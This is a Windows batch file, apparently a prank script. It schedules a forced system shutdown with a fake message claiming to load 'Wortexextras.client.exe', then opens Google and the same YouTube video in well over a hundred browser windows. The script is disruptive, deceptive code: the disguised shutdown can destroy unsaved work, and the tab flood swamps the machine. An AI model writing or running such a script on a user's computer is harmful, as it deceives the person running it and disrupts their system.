@echo off
start
https://www.youtube.com/watch?v=dQw4w9WgXcQ
shutdown -s -t 213 -c "Loading Wortexextras.client.exe "
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ
start https://www.google.com
start https://www.youtube.com/watch?v=dQw4w9WgXcQ